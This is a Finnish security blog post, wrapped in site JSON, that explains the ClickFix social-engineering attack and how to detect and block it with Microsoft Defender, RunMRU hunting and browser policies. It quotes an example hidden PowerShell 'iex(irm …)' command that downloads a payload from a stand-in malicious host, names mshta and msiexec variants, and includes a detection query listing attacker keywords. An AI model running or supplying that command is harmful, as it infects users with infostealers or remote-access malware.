[{"data":1,"prerenderedAt":1128},["ShallowReactive",2],{"sc:header-data-fi":3,"sc:footer-data-fi":489,"author-fi-nadine-kern-166cee5a31dd89":519,"content-fi-nadine-kern":550,"content-events-fi-nadine-kern":1113,"authors_data:Fritz Zurhorst|Nadine Klein":1114},{"lang":4,"home":5,"navigation":17,"meta":479,"contact":485},"de",{"name":6,"folderSwitch":7,"imgLight":10,"img":11,"languages":12},"home",[8,9],"authors","blog","/logos/gk-Logo-sw.svg","/logos/gk-Logo-rgb.svg",{"fi":13},{"title":14,"url":15,"alt":16},"Etusivu","/fi","glueckkanja Logo",[18,127,231,316,395,402],{"name":19,"languages":20,"children":24},"workplace",{"fi":21},{"title":22,"description":23},"Workplace","Microsoft 365 -pohjaiset älykkäät, turvalliset ja joustavat työympäristöt, jotka yhdistävät nykyaikaiset teknologiat ja identiteettipalvelut.",[25,55,91],{"name":26,"languages":27,"children":30},"portfolio",{"fi":28},{"title":29},"Portfolio",[31,37,43,49],{"name":32,"languages":33},"managed-intune",{"fi":34},{"title":35,"url":36},"Managed Intune","/fi/entra-intune/managed-intune",{"name":38,"languages":39},"managed-entra",{"fi":40},{"title":41,"url":42},"Managed Entra","/fi/entra-intune/managed-entra",{"name":44,"languages":45},"managed-workplace",{"fi":46},{"title":47,"url":48},"Managed Workplace","/fi/workplace/managed-workplace",{"name":50,"languages":51},"consulting-services",{"fi":52},{"title":53,"url":54},"Consulting Services","/fi/workplace/consulting-services",{"name":56,"languages":57,"children":60},"microsoft-365-endpoint",{"fi":58},{"title":59},"Microsoft 365 Endpoint",[61,67,73,79,85],{"name":62,"languages":63},"microsoft-entra-suite",{"fi":64},{"title":65,"url":66},"Microsoft Entra Suite","/fi/workplace/microsoft-entra-suite",{"name":68,"languages":69},"microsoft-intune",{"fi":70},{"title":71,"url":72},"Microsoft Intune","/fi/workplace/microsoft-intune",{"name":74,"languages":75},"microsoft-windows",{"fi":76},{"title":77,"url":78},"Microsoft Windows","/fi/workplace/microsoft-windows",{"name":80,"languages":81},"windows-365-cloud-pc",{"fi":82},{"title":83,"url":84},"Windows 365 Cloud PC","/fi/workplace/windows365-cloud-pc",{"name":86,"languages":87},"cloud-workplace-foundation",{"fi":88},{"title":89,"url":90},"Cloud Workplace Foundation","/fi/workplace/cloud-workplace-foundation",{"name":92,"languages":93,"children":96},"microsoft-365-collaboration",{"fi":94},{"title":95},"Microsoft 365 Collaboration",[97,103,109,115,121],{"name":98,"languages":99},"microsoft-copilot",{"fi":100},{"title":101,"url":102},"Microsoft 365 Copilot","/fi/workplace/microsoft-365-copilot",{"name":104,"languages":105},"microsoft-teams",{"fi":106},{"title":107,"url":108},"Teams","/fi/workplace/microsoft-teams",{"name":110,"languages":111},"sharepoint-powerplatform",{"fi":112},{"title":113,"url":114},"SharePoint & Power Platform","/fi/workplace/sharepoint-power-platform",{"name":116,"languages":117},"exchange-online",{"fi":118},{"title":119,"url":120},"Exchange Online","/fi/workplace/exchange-online",{"name":122,"languages":123},"information-protection-compliance",{"fi":124},{"title":125,"url":126},"Information Protection & Compliance","/fi/workplace/information-protection-compliance",{"name":128,"languages":129,"children":133},"azure",{"fi":130},{"title":131,"description":132},"Azure","Vauhdita kasvua Azurella: leikkaa pilvikustannuksia, paranna tehokkuutta ja edistä innovaatioita IaaS:n ja PaaS:n avulla.",[134,151,181],{"name":135,"languages":136,"children":138},"azure-portfolio",{"fi":137},{"title":29},[139,145],{"name":140,"languages":141},"azure-managed-services",{"fi":142},{"title":143,"url":144},"Azure Managed Services","/fi/azure/azure-managed-services",{"name":146,"languages":147},"azure-consulting",{"fi":148},{"title":149,"url":150},"Azure Consulting","/fi/azure/azure-consulting",{"name":152,"languages":153,"children":156},"azure-scenarios",{"fi":154},{"title":155},"Skenaariot",[157,163,169,175],{"name":158,"languages":159},"plan-your-cloud",{"fi":160},{"title":161,"url":162},"Suunnittele pilvesi","/fi/azure/plan-your-cloud",{"name":164,"languages":165},"migrate-to-the-cloud",{"fi":166},{"title":167,"url":168},"Siirry pilveen","/fi/azure/migrate-to-the-cloud",{"name":170,"languages":171},"innovate-your-business",{"fi":172},{"title":173,"url":174},"Uudista liiketoimintasi","/fi/azure/innovate-your-business",{"name":176,"languages":177},"vmware-exit",{"fi":178},{"title":179,"url":180},"Mieti VMware-strategiasi uudelleen","/fi/azure/vmware-exit",{"name":182,"languages":183,"children":186},"azure-practices",{"fi":184},{"title":185},"Practices",[187,193,199,202,208,213,219,225],{"name":188,"languages":189},"azure-foundation",{"fi":190},{"title":191,"url":192},"Azure Foundation","/fi/azure/azure-foundation",{"name":194,"languages":195},"azure-ai-foundation",{"fi":196},{"title":197,"url":198},"Azure AI Foundation","/fi/azure/azure-ai-foundation",{"name":86,"languages":200},{"fi":201},{"title":89,"url":90},{"name":203,"languages":204},"azure-data-foundation",{"fi":205},{"title":206,"url":207},"Azure Data Foundation","/fi/azure/azure-data-foundation",{"name":188,"languages":209},{"fi":210},{"title":211,"url":212},"Azure Container Foundation","/fi/azure/azure-container-foundation",{"name":214,"languages":215},"dark-tenant",{"fi":216},{"title":217,"url":218},"Managed Dark Tenant","/fi/azure/managed-dark-tenant",{"name":220,"languages":221},"azure-cloud-adoption-framework",{"fi":222},{"title":223,"url":224},"Cloud Adoption Framework","/fi/azure/cloud-adoption-framework",{"name":226,"languages":227},"azure-cloud-competence-center",{"fi":228},{"title":229,"url":230},"Cloud Competence Center","/fi/azure/cloud-competence-center",{"name":232,"languages":233,"children":242},"security",{"fi":234},{"title":235,"description":236,"emergency":237},"Tietoturva","Valppautta pilvessä palkitulla 24/7-hallintapalvelulla, häiriötilanteiden hallinnalla ja huippuluokan suojauksella infrastruktuurillesi.",{"text":238,"href":239,"skin":240,"icon":241},"Hyökkäyksen kohteena?","/fi/security/are-you-under-attack","primary","emergency",[243,268,289],{"name":244,"children":245},"security-security-consulting",[246,252,256,262],{"name":247,"languages":248},"managed-red-tenant",{"fi":249},{"title":250,"url":251},"Managed Red Tenant","/fi/security/managed-red-tenant",{"name":214,"languages":253},{"fi":254},{"title":255,"url":218},"Dark Tenant",{"name":257,"languages":258},"sentinel-data-lake",{"fi":259},{"title":260,"url":261},"Sentinel Data Lake","/fi/security/sentinel-data-lake",{"name":263,"languages":264},"security-consulting",{"fi":265},{"title":266,"url":267},"Security Consulting","/fi/security/security-consulting",{"name":269,"children":270},"security-cloud-security-operations-center",[271,277,283],{"name":272,"languages":273},"cloud-security-operations-center",{"fi":274},{"title":275,"url":276},"Cloud Security Operations Center","/fi/security/cloud-security-operations-center",{"name":278,"languages":279},"global-secure-access",{"fi":280},{"title":281,"url":282},"Global Secure Access","/fi/security/global-secure-access",{"name":284,"languages":285},"my-work-id",{"fi":286},{"title":287,"url":288},"MyWorkID","/fi/security/my-work-id",{"name":290,"children":291},"security-preventive-services",[292,298,304,310],{"name":293,"languages":294},"preventive-services",{"fi":295},{"title":296,"url":297},"Preventive Services","/fi/security/preventive-services",{"name":299,"languages":300},"data-security-services",{"fi":301},{"title":302,"url":303},"Data Security Service","/fi/security/data-security-service",{"name":305,"languages":306},"security-copilot-agents",{"fi":307},{"title":308,"url":309},"Security Copilot Agents","/fi/security/security-copilot-agents",{"name":311,"languages":312},"nis2",{"fi":313},{"title":314,"url":315},"NIS2:n käyttöönotto","/fi/security/red-dark-tenant-nis2",{"name":317,"languages":318,"children":322},"products",{"fi":319},{"title":320,"description":321},"Tuotteet","Innovatiiviset täydentävät tuotteet täysin turvalliseen, 100-prosenttisesti pilvipohjaiseen Microsoft-ympäristöön, jotka parantavat yhteistyötä, verkon todennusta ja ohjelmistojen hallintaa.",[323,360],{"name":324,"products":325,"children":326},"lorem ipsum 1",true,[327,336,344,352],{"name":328,"img":329,"target":330,"languages":331},"realmjoin","products/realmjoin/realmjoin-nav-logo.svg","_blank",{"fi":332},{"title":333,"url":334,"subtitle":335},"RealmJoin","https://www.realmjoin.com","Pilvipohjainen ohjelmistojen jakelu",{"name":337,"img":338,"target":330,"languages":339},"scepman","products/scepman/scepman-nav-logo.svg",{"fi":340},{"title":341,"url":342,"subtitle":343},"SCEPman","https://www.scepman.com","Varmenteiden jakelu pilvestä",{"name":345,"img":346,"target":330,"languages":347},"konnekt","products/konnekt/konnekt-nav-logo.svg",{"fi":348},{"title":349,"url":350,"subtitle":351},"KONNEKT","https://www.konnekt.io","Työskentele paikallisten Office 365 -tietojesi kanssa",{"name":353,"img":354,"target":330,"languages":355},"realmigrator","products/realmigrator/realmigrator-nav-logo.svg",{"fi":356},{"title":357,"url":358,"subtitle":359},"RealMigrator","https://www.realmigrator.com","Siirrä tietosi palvelimelta toiselle",{"name":361,"products":325,"children":362},"lorem ipsum 2",[363,371,379,387],{"name":364,"img":365,"target":330,"languages":366},"terraprovider","products/terraprovider/terraprovider-nav-logo.svg",{"fi":367},{"title":368,"url":369,"subtitle":370},"TerraProvider","https://www.terraprovider.com","Terraform Provider Microsoft 365:lle",{"name":372,"img":373,"target":330,"languages":374},"radiusaas","products/radius/radius-nav-logo.svg",{"fi":375},{"title":376,"url":377,"subtitle":378},"RADIUSaaS","https://www.radius-as-a-service.com","Todennus verkollesi",{"name":380,"img":381,"target":330,"languages":382},"unifiedcontacts","products/unified-contacts/unifiedcontact-nav-logo.svg",{"fi":383},{"title":384,"url":385,"subtitle":386},"Unified Contacts","https://www.unified-contacts.com","Etsi yhteystietoja Microsoft Teamsista",{"name":388,"img":389,"target":330,"languages":390},"autopilotmonitor","products/autopilot-monitor/AutopilotMonitor-nav-logo.svg",{"fi":391},{"title":392,"url":393,"subtitle":394},"Autopilot Monitor","https://www.autopilotmonitor.com","Windows Autopilot -valvonta reaaliajassa",{"name":396,"languages":397},"casestudies",{"fi":398},{"title":399,"url":400,"description":401},"Asiakastarinat","/fi/casestudies","Pilven edelläkävijä: paras Microsoft-kumppanisi kattaviin pilviratkaisuihin Blueprint-pohjaisella lähestymistavalla ja Infrastructure-as-Code-osaamisella.",{"name":403,"languages":404,"children":407},"company",{"fi":405},{"title":406,"description":401},"Yritys",[408,438,462],{"name":409,"languages":410,"children":413},"company-about-us",{"fi":411},{"title":412},"Tietoa meistä",[414,420,426,432],{"name":415,"languages":416},"company-facts-figures",{"fi":417},{"title":418,"url":419},"Faktat ja luvut","/fi/company/facts-and-figures",{"name":421,"languages":422},"company-contact",{"fi":423},{"title":424,"url":425},"Yhteystiedot ja toimipisteet","/fi/company/contact-and-locations",{"name":427,"languages":428},"switzerland",{"fi":429},{"title":430,"url":431},"glueckkanja Sveitsi","/fi/company/switzerland",{"name":433,"languages":434},"austria",{"fi":435},{"title":436,"url":437},"glueckkanja Itävalta","/fi/company/austria",{"name":439,"languages":440,"children":443},"company-career",{"fi":441},{"title":442},"Ura",[444,450,456],{"name":445,"languages":446},"company-career-overview",{"fi":447},{"title":448,"url":449},"Urakatsaus","/fi/career",{"name":451,"languages":452},"company-young-professionals",{"fi":453},{"title":454,"url":455},"Young Professionals","/fi/young-professionals",{"name":457,"languages":458},"company-jobs",{"fi":459},{"title":460,"url":461},"Avoimet työpaikat","/fi/job-offers",{"name":463,"languages":464,"children":467},"company-latest",{"fi":465},{"title":466},"Uusimmat",[468,474],{"name":469,"languages":470},"company-blog",{"fi":471},{"title":472,"url":473},"Blogi","/fi/blog",{"name":469,"languages":475},{"fi":476},{"title":477,"url":478},"Tapahtumat","/fi/events",[480],{"name":481,"languages":482},"career-meta",{"fi":483},{"title":442,"url":449,"active":484},false,{"languages":486},{"fi":487},{"title":488,"url":425,"active":484},"Yhteystiedot",{"data":490},{"bgColor":491,"number":492,"mail":493,"brandLogos":494,"logos":495,"links":499,"linksFi":509},"var(--color-gk-mid-blue)","+49 69 4005520","info@glueckkanja.com",null,[496],{"img":10,"alt":16,"url":497,"class":498},"index.html","max-w-19rem",[500,503,506],{"title":501,"url":502},"Datenschutz","/de/privacy",{"title":504,"url":505},"Impressum","/de/imprint",{"title":507,"url":508},"No Cookies","/de/cookies",[510,513,516],{"title":511,"url":512},"Tietosuoja","/fi/privacy",{"title":514,"url":515},"Oikeudelliset tiedot","/fi/imprint",{"title":517,"url":518},"Ei evästeitä","/fi/cookies",{"id":520,"title":521,"body":522,"description":528,"extension":533,"meta":534,"name":535,"navigation":325,"otherLanguages":536,"path":546,"seo":547,"stem":548,"__hash__":549},"authors/nadine-kern.md","Nadine Kern",{"type":523,"value":524,"toc":529},"minimal",[525],[526,527,528],"p",{},"Nadine Klein arbeitet als Cloud Architect im Bereich Security. Sie berät Kunden bei der Planung und Umsetzung der Microsoft 365 Defender Produkte. Außerdem betreut sie unsere Kunden im Cloud Security Operations Center und ist Teil unseres APT Repsonse Teams bei kompromittierten oder verschlüsselten Kundenumgebungen.",{"title":530,"searchDepth":531,"depth":531,"links":532},"",2,[],"md",{},"Nadine Klein",{"en":537,"es":538,"sv":539,"fi":540,"da":541,"ko":542,"nl":543,"no":544,"ja":545},"Nadine Klein works as a Cloud Architect in the area of Security. She advises customers on the planning and implementation of Microsoft 365 Defender products. She also supports our customers in the Cloud Security Operations Center and is part of our APT Repsonse team for compromised or encrypted customer environments.","Nadine Klein trabaja como Cloud Architect en el ámbito de Security. Asesora a los clientes en la planificación e implementación de los productos Microsoft 365 Defender. Además, atiende a nuestros clientes en el Cloud Security Operations Center y forma parte de nuestro APT Response Team en entornos de clientes comprometidos o cifrados.","Nadine Klein arbetar som Cloud Architect inom området Security. Hon rådgiver kunder vid planering och genomförande av Microsoft 365 Defender-produkterna. Dessutom betjänar hon våra kunder i Cloud Security Operations Center och ingår i vårt APT Response Team vid komprometterade eller krypterade kundmiljöer.","Nadine Klein työskentelee Cloud Architectina Security-alueella. Hän neuvoo asiakkaita Microsoft 365 Defender -tuotteiden suunnittelussa ja käyttöönotossa. Lisäksi hän palvelee asiakkaitamme Cloud Security Operations Centerissä ja on osa APT Response Team -tiimiämme vaarantuneissa tai salatuissa asiakasympäristöissä.","Nadine Klein arbejder som Cloud Architect inden for området Security. Hun rådgiver kunder om planlægning og implementering af Microsoft 365 Defender-produkterne. Desuden betjener hun vores kunder i Cloud Security Operations Center og er en del af vores APT Response Team ved kompromitterede eller krypterede kundemiljøer.","Nadine Klein은 Security 분야의 Cloud Architect로 일하고 있습니다. 그녀는 Microsoft 365 Defender 제품의 계획 및 구현과 관련하여 고객에게 자문을 제공합니다. 또한 Cloud Security Operations Center에서 고객을 지원하며, 침해되었거나 암호화된 고객 환경에 대응하는 APT Response Team의 일원이기도 합니다.","Nadine Klein werkt als Cloud Architect op het gebied van security. Ze adviseert klanten bij de planning en implementatie van de Microsoft 365 Defender producten. Daarnaast begeleidt ze onze klanten in het Cloud Security Operations Center en is ze onderdeel van ons APT Response Team bij gecompromitteerde of versleutelde klantomgevingen.","Nadine Klein jobber som Cloud Architect innen security. Hun rådgir kunder ved planlegging og implementering av Microsoft 365 Defender-produktene. I tillegg følger hun opp kundene våre i Cloud Security Operations Center og er en del av APT Response-teamet vårt ved kompromitterte eller krypterte kundemiljøer.","Nadine KleinはSecurity領域のCloud Architectです。Microsoft 365 Defender製品の計画と導入についてお客様を支援しています。さらに、Cloud Security Operations Centerで当社のお客様を担当し、侵害されたり暗号化されたりしたお客様環境に対応するAPT Response Teamの一員でもあります。","/nadine-kern",{"title":521,"description":528},"nadine-kern","56qh4Ybfi7H4W9Itn4ADcyI2MJdu50TKarjr_ArknXo",[551],{"id":552,"title":553,"author":554,"body":556,"cta":494,"description":530,"eventid":494,"extension":533,"hideInRecent":484,"layout":1065,"meta":1066,"moment":1070,"navigation":325,"path":1105,"seo":1106,"stem":1107,"tags":1108,"webcast":484,"__hash__":1112},"content_fi/posts/2026-09-21-clickfix-prevent-detect.md","ClickFix. Kun käyttäjä on se exploit, ja miten te pysäytätte sen",[555,535],"Fritz Zurhorst",{"type":523,"value":557,"toc":1054},[558,563,566,569,576,584,587,593,596,615,626,632,638,641,645,647,650,653,657,659,662,676,680,682,689,768,785,788,792,794,797,812,815,818,822,824,827,830,855,859,861,864,871,875,877,880,906,909,912,915,1014,1017,1020,1023,1034,1037,1041,1043,1050],[559,560,562],"h2",{"id":561},"clickfix-hyökkäysketju","ClickFix-hyökkäysketju",[526,564,565],{},"{: .h3-font-size}",[526,567,568],{},"ClickFix on hyökkäys, jossa käyttäjistä tulee omia hyökkääjiään. Ei exploitia, ei haavoittuvuutta. Uhri suorittaa haittakoodin itse, yhdellä ainoalla copy-pastella.",[526,570,571],{},[572,573],"img",{"alt":574,"src":575},"ClickFix-hyökkäysketju viidessä vaiheessa: houkutin, temppu, copy-paste, suoritus, infektio.","https://res.cloudinary.com/c4a8/image/upload/blog/pics/click-fix-img-01.png",[526,577,578,579,583],{},"Houkutin on social engineering: väärennetty CAPTCHA haitallisella sivulla, valheellinen tuki-ilmoitus (”selaimesi tarvitsee päivityksen”), phishing-viesti tai väärennetty kokoussivu. Sillä aikaa kun uhri on sivulla, JavaScript kirjoittaa payloadin leikepöydälle ",[580,581,582],"code",{},"clipboard.writeText()","-kutsulla. Sitten sivu kehottaa käyttäjää painamaan Win+R, Ctrl+V ja Enter. Suorita-dialogi käynnistää sen, mikä leikepöydällä on.",[526,585,586],{},"Tyypillinen houkutin näyttää tältä:",[526,588,589],{},[572,590],{"alt":591,"src":592},"Kuvakaappaus väärennetystä CAPTCHA-houkuttimesta, joka kehottaa käyttäjää painamaan Win ja X, sitten liittämään ja suorittamaan komennon Enterillä.","https://res.cloudinary.com/c4a8/image/upload/c_limit,w_1600,f_auto,q_auto/blog/pics/click-fix-img-02.png",[526,594,595],{},"Komento, jonka se asettaa leikepöydälle, näyttää tältä:",[597,598,600],"div",{"style":599},"background: var(--color-bg-grey); border-radius: 6px; padding: 1rem; margin: 0.25rem 0",[601,602,606],"pre",{"className":603,"code":604,"language":605,"meta":530,"style":530},"language-powershell shiki shiki-themes github-light github-dark","powershell.exe -w h iex(irm 'https://malicious[.]tld/payload' -UseBasicParsing)\n","powershell",[580,607,608],{"__ignoreMap":530},[609,610,613],"span",{"class":611,"line":612},"line",1,[609,614,604],{},[526,616,617,618,621,622,625],{},"Kaksi asiaa tapahtuu samanaikaisesti. PowerShell käynnistyy piilotetussa ikkunassa (",[580,619,620],{},"-w h","), ja ",[580,623,624],{},"iex(irm …)"," lataa payloadin ja suorittaa sen suoraan muistissa. Mitään ei päädy levylle, joten signatuuripohjaisella virustorjunnalla ei ole mitään skannattavaa. Toinen vaihe on useimmiten infostealer (Lumma, Vidar, RedLine, StealC), Remote Access Trojan tai ransomware-loader.",[526,627,628,629,631],{},"Sama kuvio Microsoft Defenderin telemetriassa, piilotettu PowerShell käynnistettynä Windows Terminalista, joka suorittaa ",[580,630,624],{},":",[526,633,634],{},[572,635],{"alt":636,"src":637},"Microsoft Defenderin Inspect-record, jossa prosessiketju WindowsTerminal.exe, pwsh.exe ja powershell.exe suorittaa iex(irm …) -komennon.","https://res.cloudinary.com/c4a8/image/upload/c_limit,w_1600,f_auto,q_auto/blog/pics/click-fix-img-03.png",[526,639,640],{},"Miksi tämä toimii niin hyvin: kaikki ajaa käyttäjän kontekstissa, ilman korotettuja oikeuksia. Evästeet, tallennetut salasanat ja istuntotokenit ovat peruskäyttäjän ulottuvilla. Hyökkääjän ei tarvitse eskaloida oikeuksia päästäkseen siihen, minkä perässä hän tuli.",[559,642,644],{"id":643},"mitä-microsoft-defender-havaitsee","Mitä Microsoft Defender havaitsee",[526,646,565],{},[526,648,649],{},"Microsoft on viime kuukausina investoinut paljon ClickFix-tunnistukseen. Jos teidän Defenderinne on terve ja oikein konfiguroitu, saatte natiivit tunnistukset ClickFix-payloadeille. Q2 2025 lähtien MDE julkaisee käyttäytymispohjaisia alerteja otsikoilla kuten ”Suspicious 'ClickFix' behavior detected”, ”Malicious PowerShell command executed via Run dialog” tai ”An active 'Pacalau' malware in a command line was prevented from executing”. Ne laukeavat MDE:n cloud-enginestä prosessiketjun analyysin kautta, rinnakkain AV-tunnistuksen kanssa ja usein pari sekuntia aiemmin.",[526,651,652],{},"Konfiguraatio, joka tekee tämän mahdolliseksi, on kuvattu alempana suorituksen kovennuksen kohdalla.",[559,654,656],{"id":655},"missä-natiivi-tunnistus-tulee-rajoilleen","Missä natiivi tunnistus tulee rajoilleen",[526,658,565],{},[526,660,661],{},"Cloud-pohjaiset ML-signatuurit tarvitsevat aikaa ennen kuin ne laukeavat. Näemme säännöllisesti yli minuutin mittaisen aukon PowerShellin käynnistymisen ja Defender-alertin välillä. Nopeampi payload livahtaa tästä ikkunasta läpi.",[526,663,664,665,667,668,671,672,675],{},"Hyökkääjät myös sopeutuvat nopeasti. Vaihda ",[580,666,605],{}," tilalle ",[580,669,670],{},"mshta http://..."," tai ",[580,673,674],{},"msiexec /i http://...",", molemmat klassisia LOLBineja, niin PowerShell-kohtaiset tunnistukset eivät enää pure.",[559,677,679],{"id":678},"aukon-sulkeminen-runmru-hunt","Aukon sulkeminen: RunMRU-hunt",[526,681,565],{},[526,683,684,685,688],{},"Tämän aukon suljemme Custom Detectioneilla. Lähtökohtana on KQL-kysely rekisteriavaimeen ",[580,686,687],{},"RunMRU",", joka kirjaa jokaisen komennon, jonka käyttäjä kirjoittaa Win+R-dialogiin.",[597,690,691],{"style":599},[601,692,696],{"className":693,"code":694,"language":695,"meta":530,"style":530},"language-kusto shiki shiki-themes github-light github-dark","DeviceRegistryEvents\n| where ActionType =~ \"RegistryValueSet\"\n| where InitiatingProcessFileName =~ \"explorer.exe\"\n| where RegistryKey has @\"\\CurrentVersion\\Explorer\\RunMRU\"\n| where RegistryValueData has \" ✅ \"\n    or (RegistryValueData has_any (\"powershell\", \"mshta\", \"curl\", \"msiexec\", \"^\")\n        and RegistryValueData matches regex \"[\\\\u0400-\\\\u04FF\\\\u0370-\\\\u03FF\\\\u0590-\\\\u05FF\\\\u0600-\\\\u06FF\\\\u0E00-\\\\u0E7F\\\\u2C80-\\\\u2CFF\\\\u13A0-\\\\u13FF\\\\u0530-\\\\u058F\\\\u10A0-\\\\u10FF\\\\u0900-\\\\u097F]\")\n    or (RegistryValueData has \"mshta\" and RegistryValueName !~ \"MRUList\" and RegistryValueData !in~ (\"mshta.exe\\\\1\", \"mshta\\\\1\"))\n    or (RegistryValueData has_any (\"bitsadmin\", \"forfiles\", \"ProxyCommand=\") and RegistryValueName !~ \"MRUList\")\n    or ((RegistryValueData startswith \"cmd\" or RegistryValueData startswith \"powershell\")\n        and (RegistryValueData has_any (\"-W Hidden \", \" -eC \", \"curl\", \"E:jscript\", \"ssh\", \"Invoke-Expression\", \"UtcNow\", \"Floor\", \"DownloadString\", \"DownloadFile\", \"FromBase64String\", \"System.IO.Compression\", \"System.IO.MemoryStream\", \"iex\", \"Invoke-WebRequest\", \"iwr\", \"Get-ADDomainController\", \"InstallProduct\", \"-w h\", \"-X POST\", \"Invoke-RestMethod\", \"-NoP -W\", \".InVOKe\", \"-useb\", \"irm \", \"^\", \"[char]\", \"[scriptblock]\", \"-UserAgent\", \"UseBasicParsing\", \".Content\")\n            or RegistryValueData matches regex @\"[-/–][Ee^]{1,2}[NnCcOoDdEeMmAa^]*\\s[A-Za-z0-9+/=]{15,}\"))\n","kusto",[580,697,698,703,708,714,720,726,732,738,744,750,756,762],{"__ignoreMap":530},[609,699,700],{"class":611,"line":612},[609,701,702],{},"DeviceRegistryEvents\n",[609,704,705],{"class":611,"line":531},[609,706,707],{},"| where ActionType =~ \"RegistryValueSet\"\n",[609,709,711],{"class":611,"line":710},3,[609,712,713],{},"| where InitiatingProcessFileName =~ \"explorer.exe\"\n",[609,715,717],{"class":611,"line":716},4,[609,718,719],{},"| where RegistryKey has @\"\\CurrentVersion\\Explorer\\RunMRU\"\n",[609,721,723],{"class":611,"line":722},5,[609,724,725],{},"| where RegistryValueData has \" ✅ \"\n",[609,727,729],{"class":611,"line":728},6,[609,730,731],{},"    or (RegistryValueData has_any (\"powershell\", \"mshta\", \"curl\", \"msiexec\", \"^\")\n",[609,733,735],{"class":611,"line":734},7,[609,736,737],{},"        and RegistryValueData matches regex \"[\\\\u0400-\\\\u04FF\\\\u0370-\\\\u03FF\\\\u0590-\\\\u05FF\\\\u0600-\\\\u06FF\\\\u0E00-\\\\u0E7F\\\\u2C80-\\\\u2CFF\\\\u13A0-\\\\u13FF\\\\u0530-\\\\u058F\\\\u10A0-\\\\u10FF\\\\u0900-\\\\u097F]\")\n",[609,739,741],{"class":611,"line":740},8,[609,742,743],{},"    or (RegistryValueData has \"mshta\" and RegistryValueName !~ \"MRUList\" and RegistryValueData !in~ (\"mshta.exe\\\\1\", \"mshta\\\\1\"))\n",[609,745,747],{"class":611,"line":746},9,[609,748,749],{},"    or (RegistryValueData has_any (\"bitsadmin\", \"forfiles\", \"ProxyCommand=\") and RegistryValueName !~ \"MRUList\")\n",[609,751,753],{"class":611,"line":752},10,[609,754,755],{},"    or ((RegistryValueData startswith \"cmd\" or RegistryValueData startswith \"powershell\")\n",[609,757,759],{"class":611,"line":758},11,[609,760,761],{},"        and (RegistryValueData has_any (\"-W Hidden \", \" -eC \", \"curl\", \"E:jscript\", \"ssh\", \"Invoke-Expression\", \"UtcNow\", \"Floor\", \"DownloadString\", \"DownloadFile\", \"FromBase64String\", \"System.IO.Compression\", \"System.IO.MemoryStream\", \"iex\", \"Invoke-WebRequest\", \"iwr\", \"Get-ADDomainController\", \"InstallProduct\", \"-w h\", \"-X POST\", \"Invoke-RestMethod\", \"-NoP -W\", \".InVOKe\", \"-useb\", \"irm \", \"^\", \"[char]\", \"[scriptblock]\", \"-UserAgent\", \"UseBasicParsing\", \".Content\")\n",[609,763,765],{"class":611,"line":764},12,[609,766,767],{},"            or RegistryValueData matches regex @\"[-/–][Ee^]{1,2}[NnCcOoDdEeMmAa^]*\\s[A-Za-z0-9+/=]{15,}\"))\n",[526,769,770,771,774,775,774,778,774,781,784],{},"Kysely merkitsee jokaisen Win+R-merkinnän, joka näyttää ClickFix-komennolta: PowerShell, mshta, curl tai msiexec yhdessä tyypillisten indikaattorien kuten ",[580,772,773],{},"-w hidden",", ",[580,776,777],{},"iex",[580,779,780],{},"irm",[580,782,783],{},"DownloadString"," tai Base64-koodattujen payloadien kanssa. Se nappaa myös hienovaraiset temput. Vihreän check-emojin, jonka moni väärennetty CAPTCHA-houkutin asettaa komennon eteen. Unicode-merkit kyrillisiltä, arabialaisilta tai thaimaalaisilta alueilta, joilla hyökkääjät naamioivat tekstiä ja kiertävät yksinkertaisia merkkijonosuodattimia. Jos jokin näistä kuvioista ilmestyy Win+R-merkintään, käynnissä on hyvin todennäköisesti ClickFix-hyökkäys.",[526,786,787],{},"CSOC-asiakkaillemme ajamme näitä ja muita Custom Detectioneja sulkeaksemme aukon uusien hyökkäystekniikoiden ja sisäänrakennetun tunnistuksen välillä.",[559,789,791],{"id":790},"suojauslayer-1-toimituksen-estäminen","Suojauslayer 1: toimituksen estäminen",[526,793,565],{},[526,795,796],{},"Nyt preventioon. ClickFix on yleinen ja menestyksekäs, joten yksittäinen suojaus ei riitä. Työskentelemme layereissa, toimituksesta suoritukseen.",[526,798,799,800,803,804,807,808,811],{},"Network Protection estää tunnetut delivery-domainit ja C2-palvelimet kaikilta selaimilta. MDE Web Content Filtering täydentää kategorioilla kuten ”Newly registered domains”, ”Hacking” ja ”Illegal Software”. Network Protection on sisäänrakennettu Windowsiin, mutta kolmannen osapuolen selaimia varten teidän täytyy poistaa QUIC ja ECH käytöstä, koska molemmat salaavat koko yhteyden ja piilottavat kohdedomainin. Poistakaa QUIC käytöstä Chromessa ja Firefoxissa enterprise-policyllä (",[580,801,802],{},"QuicAllowed = Disabled"," Chromessa, ",[580,805,806],{},"network.http.http3.enable = false"," Firefoxissa); ECH:ta varten asetatte Chromessa ",[580,809,810],{},"EncryptedClientHelloEnabled = Disabled",".",[526,813,814],{},"Edgeä varten aktivoitte SmartScreenin. Kolmannen osapuolen selaimissa kytkette päälle niiden sisäänrakennetun Safe Browsingin. Se ei ole sama asia kuin Network Protection, mutta auttaa haitallisten sivujen suodattamisessa. Sähköpostivektorin osalta Safe Links ja Safe Attachments tarkistavat linkit ja liitteet, ennen kuin käyttäjät ovat niiden kanssa tekemisissä.",[526,816,817],{},"Koukku on tässä: kaikki tämä puree vain tunnettuun infrastruktuuriin. Ajankohtaiset ClickFix-kampanjat kulkevat tuoreeltaan rekisteröidyn infrastruktuurin kautta, joka identifioidaan ja estetään liian myöhään, ja joskus legitiimien sivujen kautta, jotka hyökkääjä on kompromentoinut. Katsotaan siis, mikä suojaa sen jälkeen kun houkutin on toimitettu.",[559,819,821],{"id":820},"suojauslayer-2-tempun-estäminen","Suojauslayer 2: tempun estäminen",[526,823,565],{},[526,825,826],{},"Pari Edgen ominaisuutta nostaa kynnystä sillä aikaa kun käyttäjä on haitallisella sivulla. Selainlaajennusten hallinta estää käyttäjiä asentamasta haitallisia tai kompromentoituja laajennuksia, jotka istuttavat ClickFix-overlayta tai manipuloivat itse leikepöytää. Edge Enhanced Security Mode asettaa tiukemmat suojatoimet tuntemattomille ja harvoin vierailluille sivuille (JIT pois käytöstä, Control Flow Guard, laitteistotuettu pinosuojaus), mikä vaikeuttaa exploitpohjaisia selainvaltauksia selvästi. Typo Protection varoittaa typosquatatuista domaineista (micros0ft.com, paypa1.com) ja estää yleisen ClickFix-toimitusvektorin väärennettyjen brändidomainien kautta.",[526,828,829],{},"Tekniset kontrollit ovat vain puoli voittoa. Käyttäjien valistus pysyy ratkaisevana. Se yksi sääntö, joka kantaa suurimman osan: jos verkkosivu kehottaa sinua liittämään jotain koneeseesi, kyseessä on hyökkäys. Tehkää siitä konkreettista awareness-koulutuksessa:",[831,832,834,835,834,843,834,849],"ul",{"style":833},"margin: 0.25rem 0","\n  